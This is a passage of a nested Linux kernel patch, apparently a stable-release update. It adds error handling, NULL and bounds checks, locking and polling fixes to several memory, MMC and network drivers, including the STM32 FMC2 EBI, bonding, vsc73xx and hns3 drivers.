+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if ((bcr & FMC2_BCR_MTYP) == val && bcr & FMC2_BCR_BURSTEN)
+ 		return 0;
+@@ -207,8 +213,11 @@ static int stm32_fmc2_ebi_check_sync_trans(struct stm32_fmc2_ebi *ebi,
+ 					   int cs)
+ {
+ 	u32 bcr;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if (bcr & FMC2_BCR_BURSTEN)
+ 		return 0;
+@@ -221,8 +230,11 @@ static int stm32_fmc2_ebi_check_async_trans(struct stm32_fmc2_ebi *ebi,
+ 					    int cs)
+ {
+ 	u32 bcr;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if (!(bcr & FMC2_BCR_BURSTEN) || !(bcr & FMC2_BCR_CBURSTRW))
+ 		return 0;
+@@ -235,8 +247,11 @@ static int stm32_fmc2_ebi_check_cpsize(struct stm32_fmc2_ebi *ebi,
+ 				       int cs)
+ {
+ 	u32 bcr, val = FIELD_PREP(FMC2_BCR_MTYP, FMC2_BCR_MTYP_PSRAM);
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+ 	if ((bcr & FMC2_BCR_MTYP) == val && bcr & FMC2_BCR_BURSTEN)
+ 		return 0;
+@@ -249,12 +264,18 @@ static int stm32_fmc2_ebi_check_address_hold(struct stm32_fmc2_ebi *ebi,
+ 					     int cs)
+ {
+ 	u32 bcr, bxtr, val = FIELD_PREP(FMC2_BXTR_ACCMOD, FMC2_BXTR_EXTMOD_D);
++	int ret;
++
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
+ 	if (prop->reg_type == FMC2_REG_BWTR)
+-		regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
+ 	else
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++	if (ret)
++		return ret;
+ 
+ 	if ((!(bcr & FMC2_BCR_BURSTEN) || !(bcr & FMC2_BCR_CBURSTRW)) &&
+ 	    ((bxtr & FMC2_BXTR_ACCMOD) == val || bcr & FMC2_BCR_MUXEN))
+@@ -268,12 +289,19 @@ static int stm32_fmc2_ebi_check_clk_period(struct stm32_fmc2_ebi *ebi,
+ 					   int cs)
+ {
+ 	u32 bcr, bcr1;
++	int ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
+-	if (cs)
+-		regmap_read(ebi->regmap, FMC2_BCR1, &bcr1);
+-	else
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
++
++	if (cs) {
++		ret = regmap_read(ebi->regmap, FMC2_BCR1, &bcr1);
++		if (ret)
++			return ret;
++	} else {
+ 		bcr1 = bcr;
++	}
+ 
+ 	if (bcr & FMC2_BCR_BURSTEN && (!cs || !(bcr1 & FMC2_BCR1_CCLKEN)))
+ 		return 0;
+@@ -305,12 +333,18 @@ static u32 stm32_fmc2_ebi_ns_to_clk_period(struct stm32_fmc2_ebi *ebi,
+ {
+ 	u32 nb_clk_cycles = stm32_fmc2_ebi_ns_to_clock_cycles(ebi, cs, setup);
+ 	u32 bcr, btr, clk_period;
++	int ret;
++
++	ret = regmap_read(ebi->regmap, FMC2_BCR1, &bcr);
++	if (ret)
++		return ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR1, &bcr);
+ 	if (bcr & FMC2_BCR1_CCLKEN || !cs)
+-		regmap_read(ebi->regmap, FMC2_BTR1, &btr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR1, &btr);
+ 	else
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &btr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR(cs), &btr);
++	if (ret)
++		return ret;
+ 
+ 	clk_period = FIELD_GET(FMC2_BTR_CLKDIV, btr) + 1;
+ 
+@@ -569,11 +603,16 @@ static int stm32_fmc2_ebi_set_address_setup(struct stm32_fmc2_ebi *ebi,
+ 	if (ret)
+ 		return ret;
+ 
+-	regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++	if (ret)
++		return ret;
++
+ 	if (prop->reg_type == FMC2_REG_BWTR)
+-		regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BWTR(cs), &bxtr);
+ 	else
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++		ret = regmap_read(ebi->regmap, FMC2_BTR(cs), &bxtr);
++	if (ret)
++		return ret;
+ 
+ 	if ((bxtr & FMC2_BXTR_ACCMOD) == val || bcr & FMC2_BCR_MUXEN)
+ 		val = clamp_val(setup, 1, FMC2_BXTR_ADDSET_MAX);
+@@ -691,11 +730,14 @@ static int stm32_fmc2_ebi_set_max_low_pulse(struct stm32_fmc2_ebi *ebi,
+ 					    int cs, u32 setup)
+ {
+ 	u32 old_val, new_val, pcscntr;
++	int ret;
+ 
+ 	if (setup < 1)
+ 		return 0;
+ 
+-	regmap_read(ebi->regmap, FMC2_PCSCNTR, &pcscntr);
++	ret = regmap_read(ebi->regmap, FMC2_PCSCNTR, &pcscntr);
++	if (ret)
++		return ret;
+ 
+ 	/* Enable counter for the bank */
+ 	regmap_update_bits(ebi->regmap, FMC2_PCSCNTR,
+@@ -942,17 +984,20 @@ static void stm32_fmc2_ebi_disable_bank(struct stm32_fmc2_ebi *ebi, int cs)
+ 	regmap_update_bits(ebi->regmap, FMC2_BCR(cs), FMC2_BCR_MBKEN, 0);
+ }
+ 
+-static void stm32_fmc2_ebi_save_setup(struct stm32_fmc2_ebi *ebi)
++static int stm32_fmc2_ebi_save_setup(struct stm32_fmc2_ebi *ebi)
+ {
+ 	unsigned int cs;
++	int ret;
+ 
+ 	for (cs = 0; cs < FMC2_MAX_EBI_CE; cs++) {
+-		regmap_read(ebi->regmap, FMC2_BCR(cs), &ebi->bcr[cs]);
+-		regmap_read(ebi->regmap, FMC2_BTR(cs), &ebi->btr[cs]);
+-		regmap_read(ebi->regmap, FMC2_BWTR(cs), &ebi->bwtr[cs]);
++		ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &ebi->bcr[cs]);
++		ret |= regmap_read(ebi->regmap, FMC2_BTR(cs), &ebi->btr[cs]);
++		ret |= regmap_read(ebi->regmap, FMC2_BWTR(cs), &ebi->bwtr[cs]);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	regmap_read(ebi->regmap, FMC2_PCSCNTR, &ebi->pcscntr);
++	return regmap_read(ebi->regmap, FMC2_PCSCNTR, &ebi->pcscntr);
+ }
+ 
+ static void stm32_fmc2_ebi_set_setup(struct stm32_fmc2_ebi *ebi)
+@@ -981,22 +1026,29 @@ static void stm32_fmc2_ebi_disable_banks(struct stm32_fmc2_ebi *ebi)
+ }
+ 
+ /* NWAIT signal can not be connected to EBI controller and NAND controller */
+-static bool stm32_fmc2_ebi_nwait_used_by_ctrls(struct stm32_fmc2_ebi *ebi)
++static int stm32_fmc2_ebi_nwait_used_by_ctrls(struct stm32_fmc2_ebi *ebi)
+ {
++	struct device *dev = ebi->dev;
+ 	unsigned int cs;
+ 	u32 bcr;
++	int ret;
+ 
+ 	for (cs = 0; cs < FMC2_MAX_EBI_CE; cs++) {
+ 		if (!(ebi->bank_assigned & BIT(cs)))
+ 			continue;
+ 
+-		regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++		ret = regmap_read(ebi->regmap, FMC2_BCR(cs), &bcr);
++		if (ret)
++			return ret;
++
+ 		if ((bcr & FMC2_BCR_WAITEN || bcr & FMC2_BCR_ASYNCWAIT) &&
+-		    ebi->bank_assigned & BIT(FMC2_NAND))
+-			return true;
++		    ebi->bank_assigned & BIT(FMC2_NAND)) {
++			dev_err(dev, "NWAIT signal connected to EBI and NAND controllers\n");
++			return -EINVAL;
++		}
+ 	}
+ 
+-	return false;
++	return 0;
+ }
+ 
+ static void stm32_fmc2_ebi_enable(struct stm32_fmc2_ebi *ebi)
+@@ -1083,10 +1135,9 @@ static int stm32_fmc2_ebi_parse_dt(struct stm32_fmc2_ebi *ebi)
+ 		return -ENODEV;
+ 	}
+ 
+-	if (stm32_fmc2_ebi_nwait_used_by_ctrls(ebi)) {
+-		dev_err(dev, "NWAIT signal connected to EBI and NAND controllers\n");
+-		return -EINVAL;
+-	}
++	ret = stm32_fmc2_ebi_nwait_used_by_ctrls(ebi);
++	if (ret)
++		return ret;
+ 
+ 	stm32_fmc2_ebi_enable(ebi);
+ 
+@@ -1131,7 +1182,10 @@ static int stm32_fmc2_ebi_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_release;
+ 
+-	stm32_fmc2_ebi_save_setup(ebi);
++	ret = stm32_fmc2_ebi_save_setup(ebi);
++	if (ret)
++		goto err_release;
++
+ 	platform_set_drvdata(pdev, ebi);
+ 
+ 	return 0;
+diff --git a/drivers/memory/tegra/tegra186.c b/drivers/memory/tegra/tegra186.c
+index 7bb73f06fad3e..fd6f5e2e01a28 100644
+--- a/drivers/memory/tegra/tegra186.c
++++ b/drivers/memory/tegra/tegra186.c
+@@ -74,6 +74,9 @@ static void tegra186_mc_client_sid_override(struct tegra_mc *mc,
+ {
+ 	u32 value, old;
+ 
++	if (client->regs.sid.security == 0 && client->regs.sid.override == 0)
++		return;
++
+ 	value = readl(mc->regs + client->regs.sid.security);
+ 	if ((value & MC_SID_STREAMID_SECURITY_OVERRIDE) == 0) {
+ 		/*
+diff --git a/drivers/mmc/core/mmc_test.c b/drivers/mmc/core/mmc_test.c
+index 155ce2bdfe622..dbbcbdeab6c51 100644
+--- a/drivers/mmc/core/mmc_test.c
++++ b/drivers/mmc/core/mmc_test.c
+@@ -3109,13 +3109,13 @@ static ssize_t mtf_test_write(struct file *file, const char __user *buf,
+ 	test->buffer = kzalloc(BUFFER_SIZE, GFP_KERNEL);
+ #ifdef CONFIG_HIGHMEM
+ 	test->highmem = alloc_pages(GFP_KERNEL | __GFP_HIGHMEM, BUFFER_ORDER);
++	if (!test->highmem) {
++		count = -ENOMEM;
++		goto free_test_buffer;
++	}
+ #endif
+ 
+-#ifdef CONFIG_HIGHMEM
+-	if (test->buffer && test->highmem) {
+-#else
+ 	if (test->buffer) {
+-#endif
+ 		mutex_lock(&mmc_test_lock);
+ 		mmc_test_run(test, testcase);
+ 		mutex_unlock(&mmc_test_lock);
+@@ -3123,6 +3123,7 @@ static ssize_t mtf_test_write(struct file *file, const char __user *buf,
+ 
+ #ifdef CONFIG_HIGHMEM
+ 	__free_pages(test->highmem, BUFFER_ORDER);
++free_test_buffer:
+ #endif
+ 	kfree(test->buffer);
+ 	kfree(test);
+diff --git a/drivers/mmc/host/dw_mmc.c b/drivers/mmc/host/dw_mmc.c
+index c78bbc22e0d1e..a0ccf88876f98 100644
+--- a/drivers/mmc/host/dw_mmc.c
++++ b/drivers/mmc/host/dw_mmc.c
+@@ -3295,6 +3295,10 @@ int dw_mci_probe(struct dw_mci *host)
+ 	host->biu_clk = devm_clk_get(host->dev, "biu");
+ 	if (IS_ERR(host->biu_clk)) {
+ 		dev_dbg(host->dev, "biu clock not available\n");
++		ret = PTR_ERR(host->biu_clk);
++		if (ret == -EPROBE_DEFER)
++			return ret;
++
+ 	} else {
+ 		ret = clk_prepare_enable(host->biu_clk);
+ 		if (ret) {
+@@ -3306,6 +3310,10 @@ int dw_mci_probe(struct dw_mci *host)
+ 	host->ciu_clk = devm_clk_get(host->dev, "ciu");
+ 	if (IS_ERR(host->ciu_clk)) {
+ 		dev_dbg(host->dev, "ciu clock not available\n");
++		ret = PTR_ERR(host->ciu_clk);
++		if (ret == -EPROBE_DEFER)
++			goto err_clk_biu;
++
+ 		host->bus_hz = host->pdata->bus_hz;
+ 	} else {
+ 		ret = clk_prepare_enable(host->ciu_clk);
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index be5348d0b22e5..c218352814430 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -578,7 +578,6 @@ static void bond_ipsec_del_sa_all(struct bonding *bond)
+ 		} else {
+ 			slave->dev->xfrmdev_ops->xdo_dev_state_delete(ipsec->xs);
+ 		}
+-		ipsec->xs->xso.real_dev = NULL;
+ 	}
+ 	spin_unlock_bh(&bond->ipsec_lock);
+ 	rcu_read_unlock();
+@@ -595,34 +594,30 @@ static bool bond_ipsec_offload_ok(struct sk_buff *skb, struct xfrm_state *xs)
+ 	struct net_device *real_dev;
+ 	struct slave *curr_active;
+ 	struct bonding *bond;
+-	int err;
++	bool ok = false;
+ 
+ 	bond = netdev_priv(bond_dev);
+ 	rcu_read_lock();
+ 	curr_active = rcu_dereference(bond->curr_active_slave);
++	if (!curr_active)
++		goto out;
+ 	real_dev = curr_active->dev;
+ 
+-	if (BOND_MODE(bond) != BOND_MODE_ACTIVEBACKUP) {
+-		err = false;
++	if (BOND_MODE(bond) != BOND_MODE_ACTIVEBACKUP)
+ 		goto out;
+-	}
+ 
+-	if (!xs->xso.real_dev) {
+-		err = false;
++	if (!xs->xso.real_dev)
+ 		goto out;
+-	}
+ 
+ 	if (!real_dev->xfrmdev_ops ||
+ 	    !real_dev->xfrmdev_ops->xdo_dev_offload_ok ||
+-	    netif_is_bond_master(real_dev)) {
+-		err = false;
++	    netif_is_bond_master(real_dev))
+ 		goto out;
+-	}
+ 
+-	err = real_dev->xfrmdev_ops->xdo_dev_offload_ok(skb, xs);
++	ok = real_dev->xfrmdev_ops->xdo_dev_offload_ok(skb, xs);
+ out:
+ 	rcu_read_unlock();
+-	return err;
++	return ok;
+ }
+ 
+ static const struct xfrmdev_ops bond_xfrmdev_ops = {
+diff --git a/drivers/net/bonding/bond_options.c b/drivers/net/bonding/bond_options.c
+index 685fb4703ee1f..06c4cd0f00024 100644
+--- a/drivers/net/bonding/bond_options.c
++++ b/drivers/net/bonding/bond_options.c
+@@ -932,7 +932,7 @@ static int bond_option_active_slave_set(struct bonding *bond,
+ 	/* check to see if we are clearing active */
+ 	if (!slave_dev) {
+ 		netdev_dbg(bond->dev, "Clearing current active slave\n");
+-		RCU_INIT_POINTER(bond->curr_active_slave, NULL);
++		bond_change_active_slave(bond, NULL);
+ 		bond_select_active_slave(bond);
+ 	} else {
+ 		struct slave *old_active = rtnl_dereference(bond->curr_active_slave);
+diff --git a/drivers/net/dsa/mv88e6xxx/global1_atu.c b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+index 7c513a03789cf..17fd62616ce6d 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1_atu.c
++++ b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+@@ -453,7 +453,8 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ 		trace_mv88e6xxx_atu_full_violation(chip->dev, spid,
+ 						   entry.portvec, entry.mac,
+ 						   fid);
+-		chip->ports[spid].atu_full_violation++;
++		if (spid < ARRAY_SIZE(chip->ports))
++			chip->ports[spid].atu_full_violation++;
+ 	}
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+diff --git a/drivers/net/dsa/ocelot/felix.c b/drivers/net/dsa/ocelot/felix.c
+index 2d2c6f941272c..73da407bb0685 100644
+--- a/drivers/net/dsa/ocelot/felix.c
++++ b/drivers/net/dsa/ocelot/felix.c
+@@ -528,7 +528,9 @@ static int felix_tag_8021q_setup(struct dsa_switch *ds)
+ 	 * so we need to be careful that there are no extra frames to be
+ 	 * dequeued over MMIO, since we would never know to discard them.
+ 	 */
++	ocelot_lock_xtr_grp_bh(ocelot, 0);
+ 	ocelot_drain_cpu_queue(ocelot, 0);
++	ocelot_unlock_xtr_grp_bh(ocelot, 0);
+ 
+ 	return 0;
+ }
+@@ -1493,6 +1495,8 @@ static void felix_port_deferred_xmit(struct kthread_work *work)
+ 	int port = xmit_work->dp->index;
+ 	int retries = 10;
+ 
++	ocelot_lock_inj_grp(ocelot, 0);
++
+ 	do {
+ 		if (ocelot_can_inject(ocelot, 0))
+ 			break;
+@@ -1501,6 +1505,7 @@ static void felix_port_deferred_xmit(struct kthread_work *work)
+ 	} while (--retries);
+ 
+ 	if (!retries) {
++		ocelot_unlock_inj_grp(ocelot, 0);
+ 		dev_err(ocelot->dev, "port %d failed to inject skb\n",
+ 			port);
+ 		ocelot_port_purge_txtstamp_skb(ocelot, port, skb);
+@@ -1510,6 +1515,8 @@ static void felix_port_deferred_xmit(struct kthread_work *work)
+ 
+ 	ocelot_port_inject_frame(ocelot, port, 0, rew_op, skb);
+ 
++	ocelot_unlock_inj_grp(ocelot, 0);
++
+ 	consume_skb(skb);
+ 	kfree(xmit_work);
+ }
+@@ -1658,6 +1665,8 @@ static bool felix_check_xtr_pkt(struct ocelot *ocelot)
+ 	if (!felix->info->quirk_no_xtr_irq)
+ 		return false;
+ 
++	ocelot_lock_xtr_grp(ocelot, grp);
++
+ 	while (ocelot_read(ocelot, QS_XTR_DATA_PRESENT) & BIT(grp)) {
+ 		struct sk_buff *skb;
+ 		unsigned int type;
+@@ -1694,6 +1703,8 @@ static bool felix_check_xtr_pkt(struct ocelot *ocelot)
+ 		ocelot_drain_cpu_queue(ocelot, 0);
+ 	}
+ 
++	ocelot_unlock_xtr_grp(ocelot, grp);
++
+ 	return true;
+ }
+ 
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index 3efd556690563..c8e9ca5d5c284 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -17,6 +17,7 @@
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/device.h>
++#include <linux/iopoll.h>
+ #include <linux/of.h>
+ #include <linux/of_device.h>
+ #include <linux/of_mdio.h>
+@@ -38,6 +39,10 @@
+ #define VSC73XX_BLOCK_ARBITER	0x5 /* Only subblock 0 */
+ #define VSC73XX_BLOCK_SYSTEM	0x7 /* Only subblock 0 */
+ 
++/* MII Block subblock */
++#define VSC73XX_BLOCK_MII_INTERNAL	0x0 /* Internal MDIO subblock */
++#define VSC73XX_BLOCK_MII_EXTERNAL	0x1 /* External MDIO subblock */
++
+ #define CPU_PORT	6 /* CPU port */
+ 
+ /* MAC Block registers */
+@@ -196,6 +201,8 @@
+ #define VSC73XX_MII_CMD		0x1
+ #define VSC73XX_MII_DATA	0x2
+ 
++#define VSC73XX_MII_STAT_BUSY	BIT(3)
++
+ /* Arbiter block 5 registers */
+ #define VSC73XX_ARBEMPTY		0x0c
+ #define VSC73XX_ARBDISC			0x0e
+@@ -269,6 +276,10 @@
+ #define IS_7398(a) ((a)->chipid == VSC73XX_CHIPID_ID_7398)
+ #define IS_739X(a) (IS_7395(a) || IS_7398(a))
+ 
++#define VSC73XX_POLL_SLEEP_US		1000
++#define VSC73XX_MDIO_POLL_SLEEP_US	5
++#define VSC73XX_POLL_TIMEOUT_US		10000
++
+ struct vsc73xx_counter {
+ 	u8 counter;
+ 	const char *name;
+@@ -484,6 +495,22 @@ static int vsc73xx_detect(struct vsc73xx *vsc)
+ 	return 0;
+ }
+ 
++static int vsc73xx_mdio_busy_check(struct vsc73xx *vsc)
++{
++	int ret, err;
++	u32 val;
++
++	ret = read_poll_timeout(vsc73xx_read, err,
++				err < 0 || !(val & VSC73XX_MII_STAT_BUSY),
++				VSC73XX_MDIO_POLL_SLEEP_US,
++				VSC73XX_POLL_TIMEOUT_US, false, vsc,
++				VSC73XX_BLOCK_MII, VSC73XX_BLOCK_MII_INTERNAL,
++				VSC73XX_MII_STAT, &val);
++	if (ret)
++		return ret;
++	return err;
++}
++
+ static int vsc73xx_phy_read(struct dsa_switch *ds, int phy, int regnum)
+ {
+ 	struct vsc73xx *vsc = ds->priv;
+@@ -491,12 +518,20 @@ static int vsc73xx_phy_read(struct dsa_switch *ds, int phy, int regnum)
+ 	u32 val;
+ 	int ret;
+ 
++	ret = vsc73xx_mdio_busy_check(vsc);
++	if (ret)
++		return ret;
++
+ 	/* Setting bit 26 means "read" */
+ 	cmd = BIT(26) | (phy << 21) | (regnum << 16);
+ 	ret = vsc73xx_write(vsc, VSC73XX_BLOCK_MII, 0, 1, cmd);
+ 	if (ret)
+ 		return ret;
+-	msleep(2);
++
++	ret = vsc73xx_mdio_busy_check(vsc);
++	if (ret)
++		return ret;
++
+ 	ret = vsc73xx_read(vsc, VSC73XX_BLOCK_MII, 0, 2, &val);
+ 	if (ret)
+ 		return ret;
+@@ -520,6 +555,10 @@ static int vsc73xx_phy_write(struct dsa_switch *ds, int phy, int regnum,
+ 	u32 cmd;
+ 	int ret;
+ 
++	ret = vsc73xx_mdio_busy_check(vsc);
++	if (ret)
++		return ret;
++
+ 	/* It was found through tedious experiments that this router
+ 	 * chip really hates to have it's PHYs reset. They
+ 	 * never recover if that happens: autonegotiation stops
+@@ -531,7 +570,7 @@ static int vsc73xx_phy_write(struct dsa_switch *ds, int phy, int regnum,
+ 		return 0;
+ 	}
+ 
+-	cmd = (phy << 21) | (regnum << 16);
++	cmd = (phy << 21) | (regnum << 16) | val;
+ 	ret = vsc73xx_write(vsc, VSC73XX_BLOCK_MII, 0, 1, cmd);
+ 	if (ret)
+ 		return ret;
+@@ -780,7 +819,7 @@ static void vsc73xx_adjust_link(struct dsa_switch *ds, int port,
+ 	 * after a PHY or the CPU port comes up or down.
+ 	 */
+ 	if (!phydev->link) {
+-		int maxloop = 10;
++		int ret, err;
+ 
+ 		dev_dbg(vsc->dev, "port %d: went down\n",
+ 			port);
+@@ -795,19 +834,17 @@ static void vsc73xx_adjust_link(struct dsa_switch *ds, int port,
+ 				    VSC73XX_ARBDISC, BIT(port), BIT(port));
+ 
+ 		/* Wait until queue is empty */
+-		vsc73xx_read(vsc, VSC73XX_BLOCK_ARBITER, 0,
+-			     VSC73XX_ARBEMPTY, &val);
+-		while (!(val & BIT(port))) {
+-			msleep(1);
+-			vsc73xx_read(vsc, VSC73XX_BLOCK_ARBITER, 0,
+-				     VSC73XX_ARBEMPTY, &val);
+-			if (--maxloop == 0) {
+-				dev_err(vsc->dev,
+-					"timeout waiting for block arbiter\n");
+-				/* Continue anyway */
+-				break;
+-			}
+-		}
++		ret = read_poll_timeout(vsc73xx_read, err,
++					err < 0 || (val & BIT(port)),
++					VSC73XX_POLL_SLEEP_US,
++					VSC73XX_POLL_TIMEOUT_US, false,
++					vsc, VSC73XX_BLOCK_ARBITER, 0,
++					VSC73XX_ARBEMPTY, &val);
++		if (ret)
++			dev_err(vsc->dev,
++				"timeout waiting for block arbiter\n");
++		else if (err < 0)
++			dev_err(vsc->dev, "error reading arbiter\n");
+ 
+ 		/* Put this port into reset */
+ 		vsc73xx_write(vsc, VSC73XX_BLOCK_MAC, port, VSC73XX_MAC_CFG,
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c
+index 786ceae344887..dd9e68465e697 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_filter.c
+@@ -1244,7 +1244,8 @@ static u64 hash_filter_ntuple(struct ch_filter_specification *fs,
+ 	 * in the Compressed Filter Tuple.
+ 	 */
+ 	if (tp->vlan_shift >= 0 && fs->mask.ivlan)
+-		ntuple |= (FT_VLAN_VLD_F | fs->val.ivlan) << tp->vlan_shift;
++		ntuple |= (u64)(FT_VLAN_VLD_F |
++				fs->val.ivlan) << tp->vlan_shift;
+ 
+ 	if (tp->port_shift >= 0 && fs->mask.iport)
+ 		ntuple |= (u64)fs->val.iport << tp->port_shift;
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+index b98ef4ba172f6..d6c871f227947 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-switch.c
+@@ -2583,13 +2583,14 @@ static int dpaa2_switch_refill_bp(struct ethsw_core *ethsw)
+ 
+ static int dpaa2_switch_seed_bp(struct ethsw_core *ethsw)
+ {
+-	int *count, i;
++	int *count, ret, i;
+ 
+ 	for (i = 0; i < DPAA2_ETHSW_NUM_BUFS; i += BUFS_PER_CMD) {
++		ret = dpaa2_switch_add_bufs(ethsw, ethsw->bpid);
+ 		count = &ethsw->buf_count;
+-		*count += dpaa2_switch_add_bufs(ethsw, ethsw->bpid);
++		*count += ret;
+ 
+-		if (unlikely(*count < BUFS_PER_CMD))
++		if (unlikely(ret < BUFS_PER_CMD))
+ 			return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 4ce43c3a00a37..0377a056aaecc 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -5728,6 +5728,9 @@ static int hns3_reset_notify_uninit_enet(struct hnae3_handle *handle)
+ 	struct net_device *netdev = handle->kinfo.netdev;
+ 	struct hns3_nic_priv *priv = netdev_priv(netdev);
+ 
++	if (!test_bit(HNS3_NIC_STATE_DOWN, &priv->state))
++		hns3_nic_net_stop(netdev);
++
+ 	if (!test_and_clear_bit(HNS3_NIC_STATE_INITED, &priv->state)) {
+ 		netdev_warn(netdev, "already uninitialized\n");
+ 		return 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 01e24b69e9203..45bd5c79e4da8 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -2696,8 +2696,17 @@ static int hclge_cfg_mac_speed_dup_h(struct hnae3_handle *handle, int speed,
+ {
+ 	struct hclge_vport *vport = hclge_get_vport(handle);
+ 	struct hclge_dev *hdev = vport->back;
++	int ret;
++
++	ret = hclge_cfg_mac_speed_dup(hdev, speed, duplex, lane_num);
++
++	if (ret)
++		return ret;
+ 
+-	return hclge_cfg_mac_speed_dup(hdev, speed, duplex, lane_num);
++	hdev->hw.mac.req_speed = speed;
++	hdev->hw.mac.req_duplex = duplex;
++
++	return 0;
+ }
+ 
+ static int hclge_set_autoneg_en(struct hclge_dev *hdev, bool enable)
+@@ -2999,17 +3008,20 @@ static int hclge_mac_init(struct hclge_dev *hdev)
+ 	if (!test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
+ 		hdev->hw.mac.duplex = HCLGE_MAC_FULL;
+ 
+-	ret = hclge_cfg_mac_speed_dup_hw(hdev, hdev->hw.mac.speed,
+-					 hdev->hw.mac.duplex, hdev->hw.mac.lane_num);
+-	if (ret)
+-		return ret;
+-
+ 	if (hdev->hw.mac.support_autoneg) {
+ 		ret = hclge_set_autoneg_en(hdev, hdev->hw.mac.autoneg);
+ 		if (ret)
+ 			return ret;
+ 	}
+ 
++	if (!hdev->hw.mac.autoneg) {
++		ret = hclge_cfg_mac_speed_dup_hw(hdev, hdev->hw.mac.req_speed,
++						 hdev->hw.mac.req_duplex,
++						 hdev->hw.mac.lane_num);
++		if (ret)
++			return ret;
++	}
++
+ 	mac->link = 0;
+ 
+ 	if (mac->user_fec_mode & BIT(HNAE3_FEC_USER_DEF)) {
+@@ -11538,8 +11550,8 @@ static void hclge_reset_done(struct hnae3_ae_dev *ae_dev)
+ 		dev_err(&hdev->pdev->dev, "fail to rebuild, ret=%d\n", ret);
+ 
+ 	hdev->reset_type = HNAE3_NONE_RESET;
+-	clear_bit(HCLGE_STATE_RST_HANDLING, &hdev->state);
+-	up(&hdev->reset_sem);
++	if (test_and_clear_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
++		up(&hdev->reset_sem);
+ }
+ 
+ static void hclge_clear_resetting_state(struct hclge_dev *hdev)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+index 877feee53804f..61e155c4d441e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+@@ -1124,10 +1124,11 @@ void hclge_mbx_handler(struct hclge_dev *hdev)
+ 		req = (struct hclge_mbx_vf_to_pf_cmd *)desc->data;
+ 
+ 		flag = le16_to_cpu(crq->desc[crq->next_to_use].flag);
+-		if (unlikely(!hnae3_get_bit(flag, HCLGE_CMDQ_RX_OUTVLD_B))) {
++		if (unlikely(!hnae3_get_bit(flag, HCLGE_CMDQ_RX_OUTVLD_B) ||
